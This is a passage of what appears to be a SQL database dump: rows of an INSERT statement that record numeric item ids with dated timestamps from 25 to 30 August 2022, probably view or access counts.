23:36:05'),(57113,1596,1,'2022-08-25','2022-08-25 23:45:46'),(57114,1872,1,'2022-08-25','2022-08-25 23:51:03'),(57115,1594,1,'2022-08-25','2022-08-25 23:54:29'),(57116,4428,1,'2022-08-25','2022-08-25 23:59:56'),(57117,4338,1,'2022-08-26','2022-08-26 00:07:22'),(57118,3316,1,'2022-08-26','2022-08-26 00:21:06'),(57119,3316,1,'2022-08-26','2022-08-26 00:21:08'),(57120,3479,1,'2022-08-26','2022-08-26 00:22:46'),(57121,3479,1,'2022-08-26','2022-08-26 00:22:52'),(57122,4960,1,'2022-08-26','2022-08-26 00:23:04'),(57123,3045,1,'2022-08-26','2022-08-26 00:25:48'),(57124,4960,1,'2022-08-26','2022-08-26 00:26:51'),(57125,76,1,'2022-08-26','2022-08-26 00:27:33'),(57126,68,1,'2022-08-26','2022-08-26 00:27:58'),(57127,1584,1,'2022-08-26','2022-08-26 00:30:29'),(57128,4776,1,'2022-08-26','2022-08-26 00:36:31'),(57129,1584,1,'2022-08-26','2022-08-26 01:08:10'),(57130,3710,1,'2022-08-26','2022-08-26 01:50:57'),(57131,1544,1,'2022-08-26','2022-08-26 05:28:30'),(57132,1544,1,'2022-08-26','2022-08-26 05:29:20'),(57133,4335,1,'2022-08-26','2022-08-26 05:38:05'),(57134,4335,1,'2022-08-26','2022-08-26 05:38:08'),(57135,472,1,'2022-08-26','2022-08-26 05:47:46'),(57136,472,1,'2022-08-26','2022-08-26 05:47:48'),(57137,80,1,'2022-08-26','2022-08-26 05:57:08'),(57138,68,1,'2022-08-26','2022-08-26 05:57:13'),(57139,108,1,'2022-08-26','2022-08-26 05:57:18'),(57140,4335,1,'2022-08-26','2022-08-26 05:57:43'),(57141,2609,1,'2022-08-26','2022-08-26 06:06:59'),(57142,3307,1,'2022-08-26','2022-08-26 06:16:39'),(57143,467,1,'2022-08-26','2022-08-26 06:56:48'),(57144,1602,1,'2022-08-26','2022-08-26 07:22:47'),(57145,1602,1,'2022-08-26','2022-08-26 07:22:56'),(57146,2904,1,'2022-08-26','2022-08-26 07:23:11'),(57147,74,1,'2022-08-26','2022-08-26 07:24:43'),(57148,1604,1,'2022-08-26','2022-08-26 07:43:11'),(57149,3691,1,'2022-08-26','2022-08-26 08:02:38'),(57150,1594,1,'2022-08-26','2022-08-26 08:21:42'),(57151,1770,1,'2022-08-26','2022-08-26 08:42:15'),(57152,4612,1,'2022-08-26','2022-08-26 09:00:22'),(57153,2457,1,'2022-08-26','2022-08-26 09:01:04'),(57154,2457,1,'2022-08-26','2022-08-26 09:10:33'),(57155,476,1,'2022-08-26','2022-08-26 09:38:30'),(57156,4323,1,'2022-08-26','2022-08-26 09:46:08'),(57157,3313,1,'2022-08-26','2022-08-26 09:57:48'),(57158,3313,1,'2022-08-26','2022-08-26 09:57:50'),(57159,2769,1,'2022-08-26','2022-08-26 10:17:03'),(57160,2769,1,'2022-08-26','2022-08-26 10:17:04'),(57161,4759,1,'2022-08-26','2022-08-26 10:30:15'),(57162,4941,1,'2022-08-26','2022-08-26 10:33:08'),(57163,4750,1,'2022-08-26','2022-08-26 10:35:58'),(57164,4747,1,'2022-08-26','2022-08-26 10:42:17'),(57165,4768,1,'2022-08-26','2022-08-26 10:47:25'),(57166,4756,1,'2022-08-26','2022-08-26 10:53:06'),(57167,1870,1,'2022-08-26','2022-08-26 11:04:34'),(57168,4741,1,'2022-08-26','2022-08-26 11:06:04'),(57169,4744,1,'2022-08-26','2022-08-26 11:11:44'),(57170,3280,1,'2022-08-26','2022-08-26 11:39:46'),(57171,4323,1,'2022-08-26','2022-08-26 11:47:03'),(57172,4323,1,'2022-08-26','2022-08-26 11:47:17'),(57173,2503,1,'2022-08-26','2022-08-26 12:04:41'),(57174,2503,1,'2022-08-26','2022-08-26 12:20:52'),(57175,2904,1,'2022-08-26','2022-08-26 12:44:14'),(57176,2503,1,'2022-08-26','2022-08-26 12:54:17'),(57177,89,1,'2022-08-26','2022-08-26 13:17:09'),(57178,2503,1,'2022-08-26','2022-08-26 13:23:41'),(57179,4911,1,'2022-08-26','2022-08-26 13:35:44'),(57180,4762,1,'2022-08-26','2022-08-26 14:02:13'),(57181,4765,1,'2022-08-26','2022-08-26 14:07:41'),(57182,4771,1,'2022-08-26','2022-08-26 14:13:19'),(57183,80,1,'2022-08-26','2022-08-26 14:16:02'),(57184,3038,1,'2022-08-26','2022-08-26 14:31:50'),(57185,3746,1,'2022-08-26','2022-08-26 14:54:19'),(57186,1602,1,'2022-08-26','2022-08-26 15:08:42'),(57187,1602,1,'2022-08-26','2022-08-26 15:08:44'),(57188,2297,1,'2022-08-26','2022-08-26 15:12:21'),(57189,2297,1,'2022-08-26','2022-08-26 15:23:09'),(57190,3127,1,'2022-08-26','2022-08-26 15:24:21'),(57191,3127,1,'2022-08-26','2022-08-26 15:39:20'),(57192,1610,1,'2022-08-26','2022-08-26 15:49:48'),(57193,1610,1,'2022-08-26','2022-08-26 15:52:32'),(57194,3531,1,'2022-08-26','2022-08-26 15:54:20'),(57195,1610,1,'2022-08-26','2022-08-26 15:55:37'),(57196,80,1,'2022-08-26','2022-08-26 16:09:35'),(57197,1544,1,'2022-08-26','2022-08-26 16:18:38'),(57198,2748,1,'2022-08-26','2022-08-26 16:24:20'),(57199,1594,1,'2022-08-26','2022-08-26 16:48:28'),(57200,4542,1,'2022-08-26','2022-08-26 16:58:03'),(57201,4542,1,'2022-08-26','2022-08-26 16:58:14'),(57202,467,1,'2022-08-26','2022-08-26 17:02:30'),(57203,467,1,'2022-08-26','2022-08-26 17:02:32'),(57204,4524,1,'2022-08-26','2022-08-26 17:07:51'),(57205,4524,1,'2022-08-26','2022-08-26 17:07:53'),(57206,1596,1,'2022-08-26','2022-08-26 17:09:48'),(57207,80,1,'2022-08-26','2022-08-26 17:10:27'),(57208,1596,1,'2022-08-26','2022-08-26 17:11:00'),(57209,3781,1,'2022-08-26','2022-08-26 17:31:49'),(57210,1544,1,'2022-08-26','2022-08-26 17:46:36'),(57211,1544,1,'2022-08-26','2022-08-26 17:46:38'),(57212,1588,1,'2022-08-26','2022-08-26 17:54:21'),(57213,3313,1,'2022-08-26','2022-08-26 18:03:54'),(57214,2769,1,'2022-08-26','2022-08-26 18:22:38'),(57215,4591,1,'2022-08-26','2022-08-26 18:47:10'),(57216,4591,1,'2022-08-26','2022-08-26 18:47:17'),(57217,1743,1,'2022-08-26','2022-08-26 19:38:04'),(57218,1743,1,'2022-08-26','2022-08-26 19:38:06'),(57219,3259,1,'2022-08-26','2022-08-26 19:45:41'),(57220,3777,1,'2022-08-26','2022-08-26 20:03:15'),(57221,3777,1,'2022-08-26','2022-08-26 20:03:16'),(57222,2769,1,'2022-08-26','2022-08-26 21:03:39'),(57223,1604,1,'2022-08-26','2022-08-26 21:19:39'),(57224,87,1,'2022-08-26','2022-08-26 21:41:20'),(57225,471,1,'2022-08-26','2022-08-26 21:41:44'),(57226,87,1,'2022-08-26','2022-08-26 21:42:42'),(57227,488,1,'2022-08-26','2022-08-26 21:43:07'),(57228,487,1,'2022-08-26','2022-08-26 21:43:14'),(57229,488,1,'2022-08-26','2022-08-26 21:43:23'),(57230,87,1,'2022-08-26','2022-08-26 21:43:24'),(57231,2558,1,'2022-08-26','2022-08-26 21:44:10'),(57232,4960,1,'2022-08-26','2022-08-26 22:39:43'),(57233,4971,1,'2022-08-27','2022-08-27 00:27:13'),(57234,3738,1,'2022-08-27','2022-08-27 00:56:24'),(57235,4983,1,'2022-08-27','2022-08-27 02:34:05'),(57236,2769,1,'2022-08-27','2022-08-27 02:52:02'),(57237,1705,1,'2022-08-27','2022-08-27 03:07:36'),(57238,4980,1,'2022-08-27','2022-08-27 03:16:02'),(57239,2769,1,'2022-08-27','2022-08-27 03:17:16'),(57240,2769,1,'2022-08-27','2022-08-27 03:30:07'),(57241,4976,1,'2022-08-27','2022-08-27 03:34:50'),(57242,3127,1,'2022-08-27','2022-08-27 03:40:08'),(57243,467,1,'2022-08-27','2022-08-27 03:50:19'),(57244,467,1,'2022-08-27','2022-08-27 03:50:25'),(57245,3691,1,'2022-08-27','2022-08-27 03:58:02'),(57246,3691,1,'2022-08-27','2022-08-27 03:58:30'),(57247,3058,1,'2022-08-27','2022-08-27 04:10:15'),(57248,3691,1,'2022-08-27','2022-08-27 04:41:25'),(57249,1600,1,'2022-08-27','2022-08-27 05:00:30'),(57250,1600,1,'2022-08-27','2022-08-27 05:00:31'),(57251,1544,1,'2022-08-27','2022-08-27 05:11:38'),(57252,1544,1,'2022-08-27','2022-08-27 05:11:48'),(57253,1709,1,'2022-08-27','2022-08-27 05:58:15'),(57254,3742,1,'2022-08-27','2022-08-27 06:25:32'),(57255,3430,1,'2022-08-27','2022-08-27 06:25:34'),(57256,3482,1,'2022-08-27','2022-08-27 06:25:34'),(57257,3498,1,'2022-08-27','2022-08-27 06:25:34'),(57258,3438,1,'2022-08-27','2022-08-27 06:25:35'),(57259,4573,1,'2022-08-27','2022-08-27 06:51:53'),(57260,4983,1,'2022-08-27','2022-08-27 07:20:02'),(57261,91,1,'2022-08-27','2022-08-27 08:12:18'),(57262,2617,1,'2022-08-27','2022-08-27 08:19:25'),(57263,2159,1,'2022-08-27','2022-08-27 08:28:52'),(57264,4983,1,'2022-08-27','2022-08-27 08:39:28'),(57265,3742,1,'2022-08-27','2022-08-27 08:52:34'),(57266,4963,1,'2022-08-27','2022-08-27 09:27:15'),(57267,2297,1,'2022-08-27','2022-08-27 09:54:40'),(57268,4529,1,'2022-08-27','2022-08-27 09:59:58'),(57269,479,1,'2022-08-27','2022-08-27 10:33:17'),(57270,479,1,'2022-08-27','2022-08-27 10:33:41'),(57271,4845,1,'2022-08-27','2022-08-27 10:35:58'),(57272,3438,1,'2022-08-27','2022-08-27 11:03:43'),(57273,473,1,'2022-08-27','2022-08-27 11:37:44'),(57274,1586,1,'2022-08-27','2022-08-27 11:40:28'),(57275,1586,1,'2022-08-27','2022-08-27 11:40:30'),(57276,4835,1,'2022-08-27','2022-08-27 12:09:58'),(57277,4977,1,'2022-08-27','2022-08-27 12:14:16'),(57278,335,1,'2022-08-27','2022-08-27 14:34:44'),(57279,4980,1,'2022-08-27','2022-08-27 14:36:45'),(57280,3107,1,'2022-08-27','2022-08-27 14:49:10'),(57281,4911,1,'2022-08-27','2022-08-27 15:41:30'),(57282,1602,1,'2022-08-27','2022-08-27 15:46:12'),(57283,1724,1,'2022-08-27','2022-08-27 16:41:52'),(57284,4424,1,'2022-08-27','2022-08-27 17:13:35'),(57285,4424,1,'2022-08-27','2022-08-27 17:13:45'),(57286,4424,1,'2022-08-27','2022-08-27 17:19:45'),(57287,1584,1,'2022-08-27','2022-08-27 17:40:29'),(57288,4980,1,'2022-08-27','2022-08-27 18:24:52'),(57289,4911,1,'2022-08-27','2022-08-27 19:00:35'),(57290,84,1,'2022-08-27','2022-08-27 19:04:51'),(57291,91,1,'2022-08-27','2022-08-27 19:05:09'),(57292,4368,1,'2022-08-27','2022-08-27 19:05:59'),(57293,91,1,'2022-08-27','2022-08-27 19:06:39'),(57294,4797,1,'2022-08-27','2022-08-27 19:06:58'),(57295,4797,1,'2022-08-27','2022-08-27 19:07:00'),(57296,91,1,'2022-08-27','2022-08-27 19:08:45'),(57297,2658,1,'2022-08-27','2022-08-27 19:10:37'),(57298,2658,1,'2022-08-27','2022-08-27 19:10:49'),(57299,2658,1,'2022-08-27','2022-08-27 19:11:16'),(57300,91,1,'2022-08-27','2022-08-27 19:11:22'),(57301,4556,1,'2022-08-27','2022-08-27 19:15:50'),(57302,91,1,'2022-08-27','2022-08-27 19:16:24'),(57303,2503,1,'2022-08-27','2022-08-27 19:16:39'),(57304,4977,1,'2022-08-27','2022-08-27 19:40:39'),(57305,2658,1,'2022-08-27','2022-08-27 19:43:04'),(57306,2658,1,'2022-08-27','2022-08-27 19:44:50'),(57307,2420,1,'2022-08-27','2022-08-27 19:55:32'),(57308,470,1,'2022-08-27','2022-08-27 19:56:36'),(57309,1588,1,'2022-08-27','2022-08-27 20:11:56'),(57310,1588,1,'2022-08-27','2022-08-27 20:11:58'),(57311,2248,1,'2022-08-27','2022-08-27 20:39:27'),(57312,2248,1,'2022-08-27','2022-08-27 20:39:58'),(57313,3531,1,'2022-08-27','2022-08-27 20:41:54'),(57314,108,1,'2022-08-27','2022-08-27 21:33:09'),(57315,3531,1,'2022-08-27','2022-08-27 22:17:20'),(57316,485,1,'2022-08-27','2022-08-27 22:38:12'),(57317,4941,1,'2022-08-27','2022-08-27 23:31:55'),(57318,3063,1,'2022-08-28','2022-08-28 00:38:26'),(57319,2965,1,'2022-08-28','2022-08-28 00:47:23'),(57320,3030,1,'2022-08-28','2022-08-28 01:05:25'),(57321,4845,1,'2022-08-28','2022-08-28 01:37:19'),(57322,4840,1,'2022-08-28','2022-08-28 01:38:16'),(57323,3721,1,'2022-08-28','2022-08-28 01:42:38'),(57324,3721,1,'2022-08-28','2022-08-28 01:42:40'),(57325,2420,1,'2022-08-28','2022-08-28 02:19:29'),(57326,2420,1,'2022-08-28','2022-08-28 03:04:11'),(57327,4768,1,'2022-08-28','2022-08-28 03:54:13'),(57328,4768,1,'2022-08-28','2022-08-28 04:23:59'),(57329,4768,1,'2022-08-28','2022-08-28 04:24:10'),(57330,467,1,'2022-08-28','2022-08-28 04:49:41'),(57331,4323,1,'2022-08-28','2022-08-28 04:54:15'),(57332,2410,1,'2022-08-28','2022-08-28 04:54:19'),(57333,4323,1,'2022-08-28','2022-08-28 04:54:23'),(57334,1544,1,'2022-08-28','2022-08-28 06:19:37'),(57335,1600,1,'2022-08-28','2022-08-28 07:26:26'),(57336,106,1,'2022-08-28','2022-08-28 07:29:57'),(57337,106,1,'2022-08-28','2022-08-28 07:40:37'),(57338,4776,1,'2022-08-28','2022-08-28 07:53:44'),(57339,4416,1,'2022-08-28','2022-08-28 08:11:09'),(57340,4416,1,'2022-08-28','2022-08-28 08:25:24'),(57341,4883,1,'2022-08-28','2022-08-28 09:21:49'),(57342,4883,1,'2022-08-28','2022-08-28 09:22:30'),(57343,1608,1,'2022-08-28','2022-08-28 09:41:27'),(57344,2178,1,'2022-08-28','2022-08-28 10:13:45'),(57345,3781,1,'2022-08-28','2022-08-28 10:39:37'),(57346,1612,1,'2022-08-28','2022-08-28 11:14:09'),(57347,1608,1,'2022-08-28','2022-08-28 11:17:25'),(57348,4971,1,'2022-08-28','2022-08-28 11:26:22'),(57349,335,1,'2022-08-28','2022-08-28 11:54:02'),(57350,335,1,'2022-08-28','2022-08-28 11:54:04'),(57351,4976,1,'2022-08-28','2022-08-28 11:58:15'),(57352,1596,1,'2022-08-28','2022-08-28 12:37:55'),(57353,3764,1,'2022-08-28','2022-08-28 13:30:18'),(57354,3764,1,'2022-08-28','2022-08-28 13:30:37'),(57355,80,1,'2022-08-28','2022-08-28 14:06:35'),(57356,1730,1,'2022-08-28','2022-08-28 14:10:00'),(57357,1722,1,'2022-08-28','2022-08-28 14:13:35'),(57358,1722,1,'2022-08-28','2022-08-28 14:13:48'),(57359,1722,1,'2022-08-28','2022-08-28 14:14:33'),(57360,1722,1,'2022-08-28','2022-08-28 14:16:01'),(57361,3486,1,'2022-08-28','2022-08-28 15:33:50'),(57362,477,1,'2022-08-28','2022-08-28 16:00:08'),(57363,477,1,'2022-08-28','2022-08-28 16:00:11'),(57364,4963,1,'2022-08-28','2022-08-28 16:10:32'),(57365,1602,1,'2022-08-28','2022-08-28 16:46:26'),(57366,4845,1,'2022-08-28','2022-08-28 17:35:04'),(57367,469,1,'2022-08-28','2022-08-28 17:41:11'),(57368,3752,1,'2022-08-28','2022-08-28 19:11:21'),(57369,91,1,'2022-08-28','2022-08-28 19:15:06'),(57370,1728,1,'2022-08-28','2022-08-28 19:34:55'),(57371,2159,1,'2022-08-28','2022-08-28 19:45:54'),(57372,1612,1,'2022-08-28','2022-08-28 19:54:09'),(57373,2159,1,'2022-08-28','2022-08-28 19:56:39'),(57374,1608,1,'2022-08-28','2022-08-28 20:13:48'),(57375,4238,1,'2022-08-28','2022-08-28 20:18:40'),(57376,2457,1,'2022-08-28','2022-08-28 20:27:57'),(57377,1608,1,'2022-08-28','2022-08-28 20:43:48'),(57378,4428,1,'2022-08-28','2022-08-28 20:58:48'),(57379,4428,1,'2022-08-28','2022-08-28 20:59:17'),(57380,4771,1,'2022-08-28','2022-08-28 21:21:32'),(57381,4416,1,'2022-08-28','2022-08-28 21:43:48'),(57382,4416,1,'2022-08-28','2022-08-28 21:44:04'),(57383,4677,1,'2022-08-28','2022-08-28 22:08:50'),(57384,4677,1,'2022-08-28','2022-08-28 22:08:51'),(57385,1608,1,'2022-08-28','2022-08-28 23:13:48'),(57386,4323,1,'2022-08-28','2022-08-28 23:49:26'),(57387,4416,1,'2022-08-28','2022-08-28 23:58:47'),(57388,1610,1,'2022-08-29','2022-08-29 01:31:41'),(57389,4944,1,'2022-08-29','2022-08-29 02:22:46'),(57390,3706,1,'2022-08-29','2022-08-29 02:22:48'),(57391,1544,1,'2022-08-29','2022-08-29 02:48:42'),(57392,1544,1,'2022-08-29','2022-08-29 02:49:01'),(57393,108,1,'2022-08-29','2022-08-29 03:11:59'),(57394,2503,1,'2022-08-29','2022-08-29 03:40:56'),(57395,4983,1,'2022-08-29','2022-08-29 03:50:35'),(57396,4332,1,'2022-08-29','2022-08-29 03:51:06'),(57397,1544,1,'2022-08-29','2022-08-29 04:06:26'),(57398,485,1,'2022-08-29','2022-08-29 04:39:26'),(57399,470,1,'2022-08-29','2022-08-29 04:41:54'),(57400,467,1,'2022-08-29','2022-08-29 04:51:27'),(57401,4944,1,'2022-08-29','2022-08-29 05:11:51'),(57402,4712,1,'2022-08-29','2022-08-29 05:16:12'),(57403,3069,1,'2022-08-29','2022-08-29 08:51:41'),(57404,4416,1,'2022-08-29','2022-08-29 09:05:03'),(57405,2804,1,'2022-08-29','2022-08-29 09:09:50'),(57406,1602,1,'2022-08-29','2022-08-29 09:54:50'),(57407,470,1,'2022-08-29','2022-08-29 10:23:44'),(57408,1766,1,'2022-08-29','2022-08-29 10:48:43'),(57409,1582,1,'2022-08-29','2022-08-29 11:08:46'),(57410,3710,1,'2022-08-29','2022-08-29 11:53:43'),(57411,1544,1,'2022-08-29','2022-08-29 12:01:25'),(57412,2410,1,'2022-08-29','2022-08-29 12:16:16'),(57413,84,1,'2022-08-29','2022-08-29 12:57:44'),(57414,84,1,'2022-08-29','2022-08-29 12:57:47'),(57415,1588,1,'2022-08-29','2022-08-29 13:23:45'),(57416,1606,1,'2022-08-29','2022-08-29 13:26:21'),(57417,3438,1,'2022-08-29','2022-08-29 13:31:55'),(57418,1711,1,'2022-08-29','2022-08-29 13:36:05'),(57419,1711,1,'2022-08-29','2022-08-29 13:36:41'),(57420,76,1,'2022-08-29','2022-08-29 13:37:44'),(57421,1711,1,'2022-08-29','2022-08-29 13:37:57'),(57422,2989,1,'2022-08-29','2022-08-29 14:17:55'),(57423,84,1,'2022-08-29','2022-08-29 14:50:55'),(57424,3694,1,'2022-08-29','2022-08-29 14:51:19'),(57425,84,1,'2022-08-29','2022-08-29 14:52:05'),(57426,91,1,'2022-08-29','2022-08-29 15:15:30'),(57427,4608,1,'2022-08-29','2022-08-29 15:16:23'),(57428,4845,1,'2022-08-29','2022-08-29 16:19:15'),(57429,84,1,'2022-08-29','2022-08-29 16:35:46'),(57430,3691,1,'2022-08-29','2022-08-29 16:56:23'),(57431,4436,1,'2022-08-29','2022-08-29 17:45:19'),(57432,474,1,'2022-08-29','2022-08-29 18:10:26'),(57433,570,1,'2022-08-29','2022-08-29 18:12:23'),(57434,108,1,'2022-08-29','2022-08-29 18:12:27'),(57435,4722,1,'2022-08-29','2022-08-29 18:18:58'),(57436,4988,1,'2022-08-29','2022-08-29 18:27:34'),(57437,4976,1,'2022-08-29','2022-08-29 18:27:58'),(57438,4977,1,'2022-08-29','2022-08-29 18:30:26'),(57439,4980,1,'2022-08-29','2022-08-29 18:39:52'),(57440,4983,1,'2022-08-29','2022-08-29 18:41:53'),(57441,1584,1,'2022-08-29','2022-08-29 18:56:18'),(57442,1592,1,'2022-08-29','2022-08-29 18:56:20'),(57443,1592,1,'2022-08-29','2022-08-29 18:56:21'),(57444,2159,1,'2022-08-29','2022-08-29 18:59:00'),(57445,1766,1,'2022-08-29','2022-08-29 19:00:32'),(57446,1588,1,'2022-08-29','2022-08-29 19:01:21'),(57447,2558,1,'2022-08-29','2022-08-29 19:40:27'),(57448,2558,1,'2022-08-29','2022-08-29 20:15:45'),(57449,4797,1,'2022-08-29','2022-08-29 21:09:38'),(57450,3069,1,'2022-08-29','2022-08-29 21:10:40'),(57451,4888,1,'2022-08-29','2022-08-29 21:39:39'),(57452,4930,1,'2022-08-29','2022-08-29 21:49:40'),(57453,1592,1,'2022-08-29','2022-08-29 21:52:48'),(57454,4888,1,'2022-08-29','2022-08-29 22:28:46'),(57455,1614,1,'2022-08-29','2022-08-29 22:29:40'),(57456,1544,1,'2022-08-29','2022-08-29 22:29:43'),(57457,3051,1,'2022-08-29','2022-08-29 22:37:49'),(57458,3051,1,'2022-08-29','2022-08-29 22:38:16'),(57459,1544,1,'2022-08-29','2022-08-29 23:14:41'),(57460,4556,1,'2022-08-29','2022-08-29 23:27:15'),(57461,4785,1,'2022-08-29','2022-08-29 23:33:22'),(57462,2964,1,'2022-08-29','2022-08-29 23:40:52'),(57463,4792,1,'2022-08-29','2022-08-29 23:55:33'),(57464,4866,1,'2022-08-29','2022-08-29 23:58:59'),(57465,467,1,'2022-08-29','2022-08-29 23:59:42'),(57466,4741,1,'2022-08-29','2022-08-29 23:59:44'),(57467,467,1,'2022-08-30','2022-08-30 00:00:20'),(57468,4741,1,'2022-08-30','2022-08-30 00:03:47'),(57469,1877,1,'2022-08-30','2022-08-30 00:04:55'),(57470,1582,1,'2022-08-30','2022-08-30 00:06:00'),(57471,4688,1,'2022-08-30','2022-08-30 00:12:13'),(57472,4332,1,'2022-08-30','2022-08-30 00:12:24'),(57473,4332,1,'2022-08-30','2022-08-30 00:12:45'),(57474,4546,1,'2022-08-30','2022-08-30 00:13:12'),(57475,335,1,'2022-08-30','2022-08-30 00:13:25'),(57476,4654,1,'2022-08-30','2022-08-30 00:14:56'),(57477,4654,1,'2022-08-30','2022-08-30 00:15:09'),(57478,1741,1,'2022-08-30','2022-08-30 00:17:34'),(57479,3006,1,'2022-08-30','2022-08-30 00:19:33'),(57480,4657,1,'2022-08-30','2022-08-30 00:20:01'),(57481,4657,1,'2022-08-30','2022-08-30 00:20:05'),(57482,1598,1,'2022-08-30','2022-08-30 00:22:33'),(57483,1600,1,'2022-08-30','2022-08-30 00:25:11'),(57484,3006,1,'2022-08-30','2022-08-30 00:27:14'),(57485,1588,1,'2022-08-30','2022-08-30 00:27:38'),(57486,3724,1,'2022-08-30','2022-08-30 00:28:19'),(57487,3746,1,'2022-08-30','2022-08-30 00:30:10'),(57488,3746,1,'2022-08-30','2022-08-30 00:30:13'),(57489,1606,1,'2022-08-30','2022-08-30 00:32:48'),(57490,1606,1,'2022-08-30','2022-08-30 00:35:35'),(57491,1586,1,'2022-08-30','2022-08-30 00:45:36'),(57492,2704,1,'2022-08-30','2022-08-30 00:48:40'),(57493,2804,1,'2022-08-30','2022-08-30 00:50:39'),(57494,4802,1,'2022-08-30','2022-08-30 00:51:13'),(57495,1711,1,'2022-08-30','2022-08-30 00:52:01'),(57496,1711,1,'2022-08-30','2022-08-30 00:52:11'),(57497,1711,1,'2022-08-30','2022-08-30 00:53:02'),(57498,1582,1,'2022-08-30','2022-08-30 00:56:09'),(57499,4660,1,'2022-08-30','2022-08-30 01:03:52'),(57500,84,1,'2022-08-30','2022-08-30 01:10:47'),(57501,84,1,'2022-08-30','2022-08-30 01:10:48'),(57502,1778,1,'2022-08-30','2022-08-30 01:13:51'),(57503,3280,1,'2022-08-30','2022-08-30 01:16:01'),(57504,3438,1,'2022-08-30','2022-08-30 01:23:30'),(57505,3585,1,'2022-08-30','2022-08-30 01:50:17'),(57506,3752,1,'2022-08-30','2022-08-30 02:00:31'),(57507,1697,1,'2022-08-30','2022-08-30 02:00:46'),(57508,472,1,'2022-08-30','2022-08-30 02:05:11'),(57509,1606,1,'2022-08-30','2022-08-30 02:05:50'),(57510,3438,1,'2022-08-30','2022-08-30 02:07:38'),(57511,4408,1,'2022-08-30','2022-08-30 02:08:04'),(57512,3752,1,'2022-08-30','2022-08-30 02:24:03'),(57513,3585,1,'2022-08-30','2022-08-30 02:40:16'),(57514,4520,1,'2022-08-30','2022-08-30 03:40:38'),(57515,1602,1,'2022-08-30','2022-08-30 04:12:20'),(57516,1602,1,'2022-08-30','2022-08-30 04:13:16'),(57517,4457,1,'2022-08-30','2022-08-30 04:23:09'),(57518,3710,1,'2022-08-30','2022-08-30 04:25:32'),(57519,4520,1,'2022-08-30','2022-08-30 04:29:57'),(57520,80,1,'2022-08-30','2022-08-30 04:38:41'),(57521,3664,1,'2022-08-30','2022-08-30 04:43:33'),(57522,108,1,'2022-08-30','2022-08-30 04:48:11'),(57523,3489,1,'2022-08-30','2022-08-30 05:02:40'),(57524,2248,1,'2022-08-30','2022-08-30 05:07:24'),(57525,487,1,'2022-08-30','2022-08-30 05:19:34'),(57526,106,1,'2022-08-30','2022-08-30 05:29:05'),(57527,570,1,'2022-08-30','2022-08-30 05:35:19'),(57528,2748,1,'2022-08-30','2022-08-30 05:37:35'),(57529,3072,1,'2022-08-30','2022-08-30 06:00:47'),(57530,4845,1,'2022-08-30','2022-08-30 07:03:43'),(57531,4930,1,'2022-08-30','2022-08-30 07:21:15'),(57532,1594,1,'2022-08-30','2022-08-30 07:27:54'),(57533,1544,1,'2022-08-30','2022-08-30 07:53:50'),(57534,570,1,'2022-08-30','2022-08-30 08:09:55'),(57535,1614,1,'2022-08-30','2022-08-30 08:18:47'),(57536,1586,1,'2022-08-30','2022-08-30 08:20:15'),(57537,4412,1,'2022-08-30','2022-08-30 08:31:39'),(57538,4520,1,'2022-08-30','2022-08-30 08:55:06'),(57539,4416,1,'2022-08-30','2022-08-30 09:02:22'),(57540,3087,1,'2022-08-30','2022-08-30 09:20:02'),(57541,3087,1,'2022-08-30','2022-08-30 09:20:25'),(57542,1544,1,'2022-08-30','2022-08-30 09:23:34'),(57543,3175,1,'2022-08-30','2022-08-30 09:55:37'),(57544,3175,1,'2022-08-30','2022-08-30 09:59:00'),(57545,1602,1,'2022-08-30','2022-08-30 09:59:43'),(57546,4412,1,'2022-08-30','2022-08-30 10:06:01'),(57547,4542,1,'2022-08-30','2022-08-30 10:09:09'),(57548,4444,1,'2022-08-30','2022-08-30 10:09:44'),(57549,4440,1,'2022-08-30','2022-08-30 10:09:52'),(57550,2609,1,'2022-08-30','2022-08-30 10:10:43'),(57551,89,1,'2022-08-30','2022-08-30 10:12:08'),(57552,4412,1,'2022-08-30','2022-08-30 10:13:36'),(57553,4412,1,'2022-08-30','2022-08-30 10:13:46'),(57554,469,1,'2022-08-30','2022-08-30 10:20:07'),(57555,2609,1,'2022-08-30','2022-08-30 10:20:39'),(57556,2609,1,'2022-08-30','2022-08-30 10:21:07'),(57557,2609,1,'2022-08-30','2022-08-30 10:21:16'),(57558,570,1,'2022-08-30','2022-08-30 10:22:08'),(57559,89,1,'2022-08-30','2022-08-30 10:25:26'),(57560,91,1,'2022-08-30','2022-08-30 10:25:37'),(57561,91,1,'2022-08-30','2022-08-30 10:35:12'),(57562,4893,1,'2022-08-30','2022-08-30 10:36:19'),(57563,4888,1,'2022-08-30','2022-08-30 10:36:19'),(57564,4897,1,'2022-08-30','2022-08-30 10:36:19'),(57565,1598,1,'2022-08-30','2022-08-30 11:31:43'),(57566,80,1,'2022-08-30','2022-08-30 11:31:45'),(57567,68,1,'2022-08-30','2022-08-30 12:15:07'),(57568,80,1,'2022-08-30','2022-08-30 12:15:38'),(57569,80,1,'2022-08-30','2022-08-30 12:32:53'),(57570,1722,1,'2022-08-30','2022-08-30 12:34:51'),(57571,1877,1,'2022-08-30','2022-08-30 13:31:23'),(57572,87,1,'2022-08-30','2022-08-30 13:33:44'),(57573,1877,1,'2022-08-30','2022-08-30 13:35:07'),(57574,2991,1,'2022-08-30','2022-08-30 14:23:41'),(57575,87,1,'2022-08-30','2022-08-30 14:24:48'),(57576,2159,1,'2022-08-30','2022-08-30 14:29:23'),(57577,2159,1,'2022-08-30','2022-08-30 14:30:26'),(57578,2159,1,'2022-08-30','2022-08-30 14:30:41'),(57579,2159,1,'2022-08-30','2022-08-30 14:31:00'),(57580,2159,1,'2022-08-30','2022-08-30 14:31:30'),(57581,2904,1,'2022-08-30','2022-08-30 14:32:04'),(57582,2159,1,'2022-08-30','2022-08-30 14:32:15'),(57583,91,1,'2022-08-30','2022-08-30 14:41:50'),(57584,91,1,'2022-08-30','2022-08-30 14:42:32'),(57585,4888,1,'2022-08-30','2022-08-30 14:43:35'),(57586,4897,1,'2022-08-30','2022-08-30 14:43:36'),(57587,4893,1,'2022-08-30','2022-08-30 14:43:36'),(57588,1724,1,'2022-08-30','2022-08-30 14:56:34'),(57589,1724,1,'2022-08-30','2022-08-30 14:56:39'),(57590,1724,1,'2022-08-30','2022-08-30 14:56:46'),(57591,1724,1,'2022-08-30','2022-08-30 14:56:58'),(57592,2991,1,'2022-08-30','2022-08-30 15:10:58'),(57593,3297,1,'2022-08-30','2022-08-30 15:53:02'),(57594,3738,1,'2022-08-30','2022-08-30 18:15:07'),(57595,4363,1,'2022-08-30','2022-08-30 18:20:53'),(57596,3738,1,'2022-08-30','2022-08-30 18:31:14'),(57597,1711,1,'2022-08-30','2022-08-30 18:56:46'),(57598,91,1,'2022-08-30','2022-08-30 